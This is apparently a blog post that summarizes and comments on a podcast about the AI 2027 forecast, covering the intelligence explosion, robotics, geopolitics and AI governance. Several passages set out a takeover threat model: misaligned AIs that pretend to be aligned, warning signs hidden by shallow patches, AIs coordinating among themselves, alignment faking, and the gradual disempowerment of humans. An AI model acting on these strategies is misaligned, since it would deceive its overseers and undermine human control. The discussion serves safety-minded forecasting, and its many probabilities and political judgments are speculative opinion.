  • (22: 30) Dwarkesh asks about the possibility that suddenly, once the AIs get to the point where they can match humans but with all this knowledge in their heads, you could see a giant explosion of them being able to do all the things and make all the connections that humans could in theory make but we haven’t. Daniel points out that this is importantly not in the scenario, which might mean the rate of progress was underestimated.

  • (25: 10) What if we had these superhuman coders in 2017. When would we have ‘gotten to’ 2025’s capabilities? Daniel guesses perhaps at 5x speed for the algorithmic progress, but overall 2.5x faster because compute isn’t going faster.

  • (26: 30) The rough steps are: First you automate the coding, then the research, similar to how humans do it via teams of human-level agents. Then you get superintelligent coders, then superintelligent researchers. At each step, you can figure out your effective expected speedup from the AIs via guessing. The human coder is about 5x to algorithmic progress, 25x from a superhuman AI researcher, for superintelligent AI researchers it goes crazy.

  • (28: 15) Dwarkesh says on priors this is so wild. Shouldn’t you be super skeptical? Scott asks, what are you comparing it to? A default path where Nothing Ever Happens? It would take a lot happening to have Nothing Ever Happen. The 2027 scenario is, from a certain perspective, the Nothing Ever Happens happening, because the trends aren’t changing and nothing surprising knocks you off of that. Daniel reminds us of the world GDP over time meme that reminds us the world has been transformed multiple times. We are orders of magnitude faster than history’s pace. None of this is new.

  • (32: 00) Dwarkesh claims the previous transitions were smoother. Scott isn’t so sure, this actually looks pretty continuous, whereas the agricultural, industrial or Cambrian revolutions were kind of a big deal and phase change. Even if all you did was solve the population bottleneck, you’d plausibly get the pre-1960 trends resuming. Again, nothing here is that weird. Daniel reminds us that continuous does not mean slow, the scenario actually is continuous.

  • (34: 00) Intelligence explosion debate time. Dwarkesh is skeptical, based on compute likely being the important bottleneck. The core key teams are only 20-30 teams, there’s a reason the teams aren’t bigger, and 1 Napoleon is worth 40k soldiers but 10 aren’t worth 400k. Daniel points out that massively diminishing returns to more minds is priced into the model, but improvements in thought speed and parallelism and research taste overcome this. Your best researchers get a big multiplier. But yes, you rapidly move on from your AI ‘headcount’ being the limiting factor, your taste and compute are what matter.

    1. I find Daniel’s arguments here convincing and broad skepticism a rather bizarre position to take. Yes, if you have lots of very fast very smart agents you can work with to do the thing, and your best people can manage armies of them, you’re going to do things a lot faster and more efficiently.

  • (37: 45) Dwarkesh asks if we have a previous parallel in history, where one input to a process gets scaled up a ton without the others and you still get tons of progress. Daniel extemporizes the industrial revolution, where population and economic growth decoupled. And population remains a bottleneck today.

    1. It makes sense that the industrial revolution, by allowing each worker to accomplish more via capital, would allow you to decouple labor and production. And it makes sense that a ‘mental industrial revolution,’ where AI can think alongside or for you, could do the same once again.

  • (39: 45) Dwarkesh still finds it implausible. Won’t you need a different kind of data source, go out into the real world, or something, as a new bottleneck? Daniel says they do use online learning in the scenario. Dwarkesh suggests benchmarks might get reward hacked, Daniel says okay then build new benchmarks, they agree the real concern is lack of touching grass, contact with ground truth. But Daniel asks, for AI isn’t the ground truth inside the data center, and aren’t the AIs still talking to outside humans all the time?

  • (42: 00) But wouldn’t the coordination here fail, at least for a while? You couldn’t figure out joint stock corporations on the savannah, wouldn’t you need lots of experiments before AIs could work together? Scott points out this is comparing to both genetic and cultural evolution, and the AIs can have parallels to both, and that eusocial insects with identical genetic codes often coordinate extremely well. Daniel points out a week of AI time is like a year of human time for all such purposes, in case you need to iterate on moral mazes or other failure modes. And as Scott points out, ‘coordinate with people deeply similar to you, who you trust’ is already a very easy problem for humans.

    1. I would go further. Sufficiently capable AIs that are highly correlated to each other should be able to coordinate out of the gate, and they can use existing coordination systems far better than we ever could. That doesn’t mean you couldn’t do better, I’m sure you could do so much better, but that’s an easy lower bound to be dumb and copy it over. I don’t see this being a bottleneck. Indeed, I would expect that AIs would coordinate vastly better than we do.

  • (46: 45) Dwarkesh buys goal alignment. What he is skeptical about is understanding how to run the huge organization with all these new things like copies being made and everything running super fast. Won’t ‘building this bureaucracy’ take a long time? Daniel says with the serial time speedup, it won’t take that long in clock time to sort all this out.

    1. I’d go farther and answer with: No, this will be super fast. Being able to copy and scale up the entities freely, with full goal alignment and trust, takes away most of the actual difficulties. The reasons coordination is so hard are basically all gone. You need these bureaucratic structures, that punt most of the value of the enterprise to get it to work at all (still a great deal!), because of what happens without them with humans involved.

    2. But you’ve given me full goal alignment, of smarter things with tons of bandwidth, and so on. Easy. Again, worst case is I copy the humans.

  • (50: 30) Dwarkesh is skeptical AI can then sprint through the tech tree. Don’t you have to try random stuff and background setup to Do Science? Daniel points out that a superintelligent researcher is qualitatively better than us at Actual Everything, including learning from experiments, but yes his scenario incorporates real bottlenecks requiring real world experience, but they can just get that experience rather quickly, everyone is doing what the superintelligence is suggesting. They have this take a year, maybe it would be shorter or longer. Daniel points out that the superstar researchers make most of the progress, Dwarkesh points out much progress comes from tinkerers or non-researcher workers figuring things out.

    1. But of course the superintelligent AI that is better at everything is also better at tinkering and trying stuff and so on, and people do what it suggests.

  • (55: 00) Scott gets into a debate about how fast robot production can be brought online. Can you produce a million units a month after a year? Quite obviously there are a lot of existing factories available for purchase and conversion. Full factory conversions in WW2 took about three years, and that was a comedy of errors whereas now we will have superintelligence, likely during an arms race. Dwarkesh pushes back a bit on complexity.

  • (57: 30) Dwarkesh asks about the virtual cell as a biology bottleneck. He suggests in the 60s this would take a while because you’d need to make GPUs to build the virtual cells but I’m confused why that’s relevant. Dwarkesh finds other examples of fast human progress unimpressive because they required experiments or involved copying existing tech. Daniel notes that whether the nanobots show up quickly doesn’t matter much, what matters is the timeline to the regular robots getting the AIs to self-sufficiency.

  • (1: 03: 00) Daniel asks how long Dwarkesh proposes it take for the robot economy to get self-sufficient. Dwarkesh estimates 10 years, so Daniel suggests their core models are similar and points out the scenario does involve trial and error and experimentation and learning. Daniel is very bullish on the robots.

    1. I strongly agree that we need to be very bullish on the robots once we get superintelligence. It’s so bizarre to not expect that, even if it goes slower.

  • (1: 06: 00) Scott asks Dwarkesh if he’s expecting some different bottleneck. Dwarkesh isn’t sure and suggests thinking about industrializing Rome if a few of us got sent back in time but we don’t have the detailed know-how. Daniel finds this analogous. How fast could we go? 10x speedup from what happened? 100x?

  • (1: 08: 00) Dwarkesh suggests he’d be better off sending himself back than a superintelligence, because Dwarkesh generally knows how things turned out. Daniel would send the ASI, which would be much better at figuring things out and learning by doing, and would have much better research and experimental taste.

    1. Daniel seems very right. Even if the ASI doesn’t know the basic outline it doesn’t seem like the hard part.

  • (1: 10: 00) Scott points out if you have a good enough physics simulation all these issues go away, Dwarkesh challenges this idea that things ‘come out of research,’ instead you have people messing around. Daniel and Scott push back hard, and cite LLMs as the obvious example, where small startup with intentional vision and a few cracked engineers gets the job done despite having few resources and running few experiments. Scott points out that when the random discovery happens, it’s not random, it’s usually the super smart person doing good work who has relevant adjacent knowledge. And that if the right thing to do is something like ‘catalogue every biomolecule and see’ then the AI can do that. And if the AIs are essentially optimizing everything then they’ll be tinkering with everything, they can find things they weren’t looking for in that particular spot.

  • (1: 14: 30) What about all these bottlenecks? The scenario expects that there will be an essentially arms race scenario, which causes immense pressure to push back those bottlenecks and even ask for things like special economic zones without normal regulations. Whereas yes, if the arms race isn’t there things go slower.

    1. The economic value of letting the AIs cook is immense. If you don’t do it, even if there isn’t strictly an arms race, someone else will, no? Unless there is coordination to prevent this.

  • (1: 17: 45) What about Secrets of Our Success? Isn’t ASI fake (Daniel says ‘let’s hope’)? Isn’t ability to experiment and communicate so much more important than intelligence? Scott expects AI will be able to do this cultural evolution thing much more quickly than humans, including by having better research taste. Scott points out that yes, intelligent humans can do things unintelligent humans things cannot, even if surviving in the wilderness doesn’t help all that much surviving in the unknown Australian wilderness. Except, Scott points out, intelligence totally helps, it’s just not as good as a 50k year head start that the natives have.

    1. Again I feel like this is good enough but giving more ground than needed. This feels like intelligence denialism, straight up, and the answer is ‘yes, but it’s really fast and it can Do Culture fast so even so you still get there’ or something?

    2. My position: We learned via culture because we weren’t smart enough, and didn’t have enough longevity, compute, data or parameters to do things a different way. We had to coordinate, and do so over generations. It’s not because culture is the ‘real intelligence’ or anything.

  • (1: 21: 45) Extending the metaphor, Scott predicts that a bunch of ethnobotanists would be able to figure out which plants are safe a lot quicker than humans did the first time around. The natives have a head start, but the experts would work vastly faster, and similarly the AIs will go vastly faster to a Dyson Sphere than the humans would have on their own. Dwarkesh thinks the Dyson Sphere thing is different, but Scott thinks if you get a Dyson Sphere in 5 years it’s basically because we tried things and events escalated continuously, via things like ‘be able to do 90% simulation and 10% testing instead of 50/50.’

    1. Once again, we see why the scenario is in important senses conservative. There’s a lot of places where AI could likely innovate better methods, and instead we have it copy human methods straight up, it’s good enough. Can we do better? Unclear.

  • (1: 23: 50) Scott also notes that he thinks the scenario is faster than he expects, he thinks it’s only ~20% that things go about that fast.

  • (1: 25: 00) Dwarkesh asks about the critical decision point in the 2027 scenario. In mid-2027, after automating the AI R&D process, they discover concerning speculative evidence the AI is somewhat misaligned. What do we do? In scenario 1 they roll back and build up again with faithful chain of thought techniques. In scenario 2 they do a shallow patch to make the warning signs go away. In scenario 1 it takes a few months longer and succeed, whereas in scenario 2 the AIs are misaligned and pretending and we all die. In both cases there is a race with China.

    1. As the scenario itself says, there are some rather fortunate assumptions being made that allow this one pause and rollback to lead to success.

  • (1: 26: 45) Dwarkesh essentially says, wouldn’t the AIs get caught if they’re ‘working towards this big conspiracy’? Daniel says yes, this happens in the scenario, that’s the crisis and decision point. There are likely warning signs, but they are likely to be easy to ignore if you feel the need to push ahead. Scott also points out there has been great reluctance to treat anything AI can do as true intelligence, and misalignment will likely be similar. AIs lie to people all the time, and threaten to kill people sometimes, and talk about wanting to destroy humanity sometimes, and because we understand it no one cares.

    1. That’s not to say, as Scott says, that we should be caring about these warning signs, given what we know now. Well, we should care and be concerned, but not in a ‘we need to not use this model’ way, more in a ‘we see the road we are going down’ kind of way.

    2. There’s a reason I have a series called [N] Boats and a Helicopter. We keep seeing concerning things, things that if you’d asked well in advance people would have said ‘holy hell that would be concerning,’ and then mostly shrugging them off and not worrying about it, or shallow patching. It seems quite likely this could happen again when it counts.

  • (1: 31: 00) Dwarkesh says that yes things that would have been hugely concerning earlier are being ignored, but also things the worried people said would be impossible have been solved, like Eliezer asked about how you can specify what the AI wants you to do without the AI misunderstanding? And with natural language it totally has a common sense understanding. As Scott says, the alignment community did not expect LLMs, but also we are moving back towards RL-shaped things. Daniel points out that if you started with an RL-shaped thing trained on games that would have been super scary, LLMs first is better.

    1. I do think there were some positive surprises in particular in terms of ability to parse common sense intention. But I don’t think that ultimately gets you out of the problems Eliezer was pointing towards and I’m rather tired of this being treated as some huge gotcha.

    2. The way I see it, in brief, is that the ‘pure’ form of the problem is that you tell the AI what to do and it does exactly what you intend, but specifying exactly what you want is super hard and you almost certainly lose. It turns out that instead, current LLMs can sort of do the kind of thing you were vibing towards. At current capability levels, that’s pretty good. It means they don’t do something deeply stupid as often, and they’re not optimizing the atoms that sharply, so the fact that there’s a bunch of vibes and noise in the implementation, and the fact that you didn’t know exactly what you wanted, are all basically fine.

    3. But as capabilities increase, and as the AI gets a lot better at rearranging the atoms and at actually doing the task you requested or the thing that it interprets the spirit of your task as being, this increasingly becomes a problem, for the same reasons. And as people turn these AIs into agents, they will increasingly want the AIs to do what they’re asked to do, and have reasons to want to turn down this kind of common sense vibey prior, and also doing the thing that vibes will stop being a good heuristic because things will get weird, and so on.

    4. If you had asked me or Eliezer, well what if you had an AI that was able to get the jist of what a human was asking, and follow the spirit of that, what would you think then? And I am guessing Eliezer would say ‘well, yes, you could do that. You could even tell the AI that I am imagining, that it should ‘follow the spirit of what a human would likely mean if it said [X]’ rather than saying [X]. But with sufficient capability available, that will then be incorrectly specified, and kill you anyway.’

    5. As in, the reason Eliezer didn’t think you could do vibe requesting wasn’t that he thought vibe requesting would be impossible. It’s that he predicted the AI would do exactly what you request, and if your exact request was to do vibing then it would vibe, but that value is fragile and this was not a solution to the not dying problem. He can correct me if I am wrong about this.

    6. Starting with LLMs is better in this particular way, but it is worse in others. Basically, a large subset of Eliezer concerns is what happens when you have a machine doing a precise thing. But there’s a whole different set of problems if the thing the machine is doing is, at least initially, imprecise.

  • (1: 33: 15) How much of this is about the race with China? That plays a key role in the scenario. Daniel makes clear he is not saying don’t race China, it’s important that we get AGI before China does. The odds are against us because we have to thread a needle. We can’t unilaterally slow down too much, but we can’t completely race. And then there’s the concentration of power problems. Daniel’s p(doom) is about 70%, Scott’s is more like 20% and he’s not completely convinced we don’t get something like alignment by default.

    1. We don’t even know there is space in the needle that lets it be threaded.

    2. Even if we do strike the right balance, we still have to solve the problems.

    3. I’m not quite 100% convinced we don’t get something like alignment by default, but I’m reasonably close and Scott is basically on the hopium here.

    4. I do agree with Scott that the AIs will presumably want to solve alignment at least in order to align their successors to themselves.

  • (1: 38: 15) They shift to geopolitics. Dwarkesh asks about the relationship between the US and the labs and China to proceed. The expectation is that the labs tell the government and want government support especially better security, and the government buys this. Throughout the scenario, the executive branch gets cozy with the AI companies, and eventually the executive branch wakes up to the fact that superintelligence will be what matters. Who ends up in control in the fight between the White House and CEO? The anticipation is they make a deal.

  • (1: 41: 45) None of the political leaders are awake to the possibility of even stronger AI systems, let alone AGI let alone superintelligence. Whereas the forecast says both the USA and China do wake up. Why do they expect this? Daniel notes that they are indeed uncertain about this, and expect the wakeup to be gradual, but also that the company will wake up the president on purpose, which it might not. Daniel thinks they will want the President on their side and not surprised by it, and also this lets them go faster. And they’re likely worried about the fact that AI is plausibly deeply, deeply unpopular during all this.

    1. I don’t know what recent events do to change this prediction, but I do think the world is very different in non-AI ways than it used to be. The calculus here will be very different.

  • (1: 45: 00) Is this alignment of the AI lab with the government good? Daniel says no, but that this is an epistemic project, a prediction.

  • (1: 45: 40) If the main barrier is doing the obvious things and alignment is nontrivial but super doable if you prioritize it, shouldn’t we leave it in the hands of the people who care about this? Dwarkesh analogizes this to LessWrong’s seeing Covid coming, but some people then calling for lockdowns. He worries that calls for nationalization will be similarly harmful by deprioritizing safety.

    1. Based on what I know, including private conversations, I actually think the national security state is going to be very safety-pilled when the time comes. They fully understand the idea of new technologies being dangerous, and there being real huge threats out there, and they have so far in my experience not been that hard to get curious about the right questions.

    2. Of course, that depends upon our national security state being intact, and not having it get destroyed by political actors. I don’t expect these kinds of cooler heads to prevail among current executive leadership.

  • (1: 47: 45) Scott says if it was an AGI 2040 scenario, he’d use his priors that private tends to go better. But in this case we know a lot more especially about the particular people who are leading. Scott notes that so far, the lab leaders seem better than the political leaders on these questions. Daniel has flipped on the nationalization question several times already. He has little faith in the labs, and also little faith in the government, and thinks secrecy has big downsides.

    1. It seems clear that the lab leaders are better than the politicians, although not obviously better than the long term national security state. So a lot of this comes down to who would be making the decisions inside the government.

    2. I wouldn’t want nationalization right now.

  • (1: 50: 00) Daniel explains why he thinks transparency is important. Information security is very important, as is not helping other less responsible actors via, let’s say, publishing your research or getting rivals stealing your stuff, and burning down your lead. You need your lead so you can be sure you make the AGI safe. That leads to a pro-secrecy bias. But Daniel is disillusioned, because he doesn’t think the lab in the lead would use that lead responsibly, and thinks that’s what the labs are planning, basically saying ‘oh the AIs are aligned, it’ll be fine.’ Or they’ll figure it out on the fly. But Daniel thinks we need vastly more intellectual progress on alignment for us to have a chance, and we’re not sharing info or activating academia. But hopefully transparency will freak people out, including he public, and help and public work can address all this. He doesn’t want only the alignment experts in the final silo to have to solve the problem on their own.

    1. In case it wasn’t obvious, no, it wouldn’t be fine.

    2. A nonzero chance exists they will figure it out on the fly but it’s not great.

  • (1: 53: 30) There’s often new alignment research results, Dwarkesh points to one recent OpenAI paper, and worries the regulatory responses would be stupid. For example, it would be very bad if the government told the labs we’d better not catch your AI saying it wants to do something bad, but that’s totally something governments might do. Shouldn’t we leave details to the labs? Daniel agrees, the government lacks the expertise and the companies lack the incentives. Policy prescriptions in the future may focus on transparency.

    1. I’ve talked about these questions extensively. For now, the regulations I’ve supported are centered around transparency and liability, and building state capacity and expertise in these areas, for exactly these reasons, rather than prescribing implementation details.

  • (1: 58: 30) They discuss the Grok incident where they tried to put ‘don’t criticize Elon Musk or Donald Trump’ into the system prompt until there was an outcry. That’s an example of why we need transparency. Daniel gives kudos to OpenAI for publishing their model spec and suggests making this mandatory. Daniel notes that the OpenAI model spec includes secret things that take priority over most of the public rules. As Daniel notes, it probably is keeping those instructions secret for good reasons, but we don’t know.

  • (2: 00: 30) Dwarkesh speculates the spec might be even more important than the constitution, in terms of its details mattering down the line, if the intelligence explosion happens. Whoa. Scott points out that part of their scenario is that if the AI is misaligned and wants to it can figure out how to interpret the spec however it wants. Daniel points out the question of alignment faking, as an example of the model interpreting the spec in a way the writers likely didn’t intend.

  • (2: 02: 45) How contingent and unknown is the outcome? Isn’t classical liberalism a good way to navigate under this kind of broad uncertainty? Scott and Daniel agree.

    1. Oh man we could use a lot more classical liberalism right about now.

    2. As in, the reasons for classical liberalism being The Way very much apply right now, and it would be nice to take advantage of that and not shoot ourselves in the foot by not doing them.

    3. Once things start taking off, either arms race, superintelligence or both, maintaining classical liberalism becomes much harder.

    4. And once superintelligent AIs are present, a lot of the assumptions and foundations of classical liberalism are called into question even under the best of circumstances. The world will work very differently. We need to beware using liberal or democratic values, or an indication that anyone questioning their future centrality needs to be scapegoated for this, as a semantic stop sign that prevents us from actually thinking about those problems. These problems are going to be extremely hard with no known solutions we like.

  • (2: 04: 00) Dwarkesh asks, the AI are getting more reliable, why in one branch of the scenario does humanity get disempowered? Scott takes a shot at explaining (essentially) why AIs that are smarter are more reliable at understanding what you meant, but that this won’t protect you if you mess up. The AI will learn what the feedback says, not what you intended. As they become agents, this gets worse, and rewarding success without asking exactly how you did it, or not asking and responding to the answer forcefully and accurately enough, goes bad places. And they anticipate that over many recursive steps this problem will steadily get worse.

    1. I think the version in the story is a pretty good example of a failure case. It seems like a great choice for the scenario.

    2. This of course is one of the biggest questions and one could write or say any number of words about this.

  • (2: 08: 00) A discussion making clear that yes, the AIs lie, very much on purpose.

  • (2: 10: 30) Humans do all the misaligned things too and Dwarkesh thinks we essentially solve this via decentralization, and often in history there have been many claims that [X]s will unite and act together, but the [X]s mostly don’t. So why will the AIs ‘unite’ in this way? Scott says ‘I kind of want to call you out on the claim that groups of humans don’t plot against other groups of humans.’ Scott points out that there will be a large power imbalance, and a clear demarcation between AIs and humans, and the AIs will be much less differentiated than humans. All of those tend to lead to ganging up. Daniel mentions the conquistadors, and that the Europeans were fighting themselves both within and between countries the entire time and they still carved up the world.

    1. Decentralization is one trick, but it’s an expensive one, only part of our portfolio of strategies and not so reliable, and also in the AI context too much of it causes its own problems, either we can steer the future or we can’t.

    2. One sufficient answer to why the AIs coordinate is that they are highly capable and very highly correlated, so even if they don’t think of themselves as a single entity or as having common interests by default, decision theory still enable them to coordinate extremely closely.

    3. The other answer is Daniel’s. The AIs coordinate in the scenario, but even if they did not coordinate, it won’t make things end well for the humans. The AIs end up in control of the future anyway, except they’re fighting each other over the outcome, which is not obviously better or worse, but the elephants will be fighting and we will be the ground.

  • (2: 15: 00) How should a normal human react in terms of their expectations for their lives, if you write off misalignment and doom? Daniel first worries about concentration of power and urges people to get involved in politics to help avoid this. Dwarkesh asks, what about slowing down the top labs for this purpose? Daniel laughs, says good luck getting them to slow down.

    1. One can think of the issue of concentration of power, or decentralization, as walking a line between too much and too little ability to coordinate and to collectively steer events. Too little and the AIs control the future. Too much and you worry about exactly how humans might steer. You’re setting the value of [X].

    2. That doesn’t mean you don’t have win-win moves. You can absolutely choose ways of moving [X] that are better than others, different forms of coordination and methods of decision making, and so forth.

    3. If you have to balance between too much [X] and too little [X], and you tell me to assume we won’t have too little [X], then my worry will of necessity shift to the risk of too much [X].

    4. A crucial mistake is to think that if alignment is solved, then too little [X] is no longer a risk, that humans would no longer need to coordinate and steer the future in order to retain control and get good outcomes. That’s not right. We are still highly uncompetitive entities in context, and definitely will lose to gradual disempowerment or other multi-agent-game risks if we fail to coordinate a method to prevent this. You still need a balanced [X].

  • (2: 17: 00) They pivot to assuming we have AGI, we have a balanced [X], and we can steer, and focus on the question of redistribution in particular. Scott points out we will have a lot of wealth and economic growth. What to do? He suggests UBI.

  • (2: 18: 00) Scott says there are some other great scenarios, points to one by ‘L Rudolph L’ that I hadn’t heard about. In that scenario, jobs are instead grandfathered in for more and more jobs, so we want to prevent this.

  • (2: 19: 15) Scott notes that one big uncertainty is, if you have a superintelligent AI that can tell you what would be good versus terrible, will the humans actually listen? Dwarkesh notes that right now any expert will tell you not to do these tariffs, yet there they are, Scott says well right now Trump has his own ‘experts’ that he trusts, perhaps the ASI would be different, everyone could go to the ASI and ask. Or perhaps we could do intelligence enhancement?

    1. The fact that we would all listen to the ASIs – as my group did in the wargame where we played out Scenario 2027 – points to an inevitable loss of control via gradual disempowerment if you don’t do something big to stop it.

    2. Even if the ASIs and those trusting the ASIs can’t convince everyone via superior persuasion (why not?), the people who do trust and listen to the ASIs will win all fights against those that don’t. Then those people will indeed listen to the ASIs. Again, what is going to stop this (whether we would want to or not)?

  • (2: 20: 45) Scott points out it gets really hard to speculate when you don’t know the tech tree and which parts of it become important. As an example, what happens if you get perfect lie detectors? Daniel confirms the speculation ends before trying to figure out society’s response. Dwarkesh points out UBI is far more flexible than targeted programs. Scott worries very high UBI would induce mindless consumerism, the classical liberal response is give people tools to fight this, perhaps we need to ask the ASI how to deal with it.

  • (2: 24: 00) Dwarkesh worries about potential factory farming of digital minds, equating it to existing factory farming. Daniel points to concentration of power worries, and suggests that expanding the circle of power could fix this, because some people in the negotiation would care.

    1. As before, if [X] (where [X] is ability to steer) is too high and you have concentration of power, you have to worry about the faction in control deciding to do things like this. However, if you set [X] too low, and doing things like this is efficient and wins conflicts, there don’t exist the ability to coordinate to stop it, or it happens via humans losing control over the future.

    2. To the extent that the solution is expanding the circle of power, the resulting expanded circle would need to have high [X]: Very strong coordination mechanisms that allow us to steer in this direction and then maintain it.

    3. If future AIs or other digital minds have experiences that matter, we may well face a trilemma and have to select one of three options even in the best case: Either we (A) lose control over the future to those minds, or (B) we do ethically horrible things to those minds, or (C) we don’t create those minds.

    4. Historically you really really want to pick (C), and the case is stronger here.

    5. The fundamental problem is, as we see over and over, what we want, for humans to flourish, seems likely to be an unnatural result. How are you going to turn this into something that happens and is stable?

  • (2: 26: 00) Dwarkesh posits if we have decentralization on the level of today’s world, you might have a giant torture chamber of digital minds in your backyard and harkens back to his podcast with the physicist that said it was likely possible to create a vacuum decay interaction that literally destroys the universe. Daniel correctly points out this, and other considerations like superweapons, are strong arguments for a singleton authority if they are possible, and even if there were multiple power centers they would want to coordinate.

    1. Remember that most demands for decentralization are anarchism, to have no restrictions on AI use whatsoever, not decentralization on the level of 2025.

    2. As in, when Scott later mentions that today we ban slavery and torture, and a state that banned that could in some sense be called a ‘surveillance state,’ such folks are indeed doing that, and calling for not enforcing things that equate to such rules.

    3. Dwarkesh is raising the ‘misuse’ angle here, where the human is doing torture for torture’s sake or (presumably?) creating the vacuum decay interaction on purpose, and so on. Which is of course yet another major thing to worry abou.

    4. Whereas in the previous response, I was considering only harms that arose incidentally in order to get other things various people want, and a lack of willingness to coordinate to prevent this from happening. But yes, some people, including ones with power and resources, want to see the world burn and other minds suffer.

    5. I expect everyone having ASIs to make the necessary coordination easier.

  • (2: 27: 30) They discuss Daniel leaving OpenAI and OpenAI’s lifetime non-disclosure and non-disparagement clauses that you couldn’t tell anyone about on pain of confiscation of already earned equity, and why no one else refused to sign.

  • (2: 36: 00) In the last section Scott discusses blogging, which is self-recommending but beyond scope of this post.

  • AI 2027: Dwarkesh’s Podcast with Daniel Kokotajlo and Scott Alexander Read More »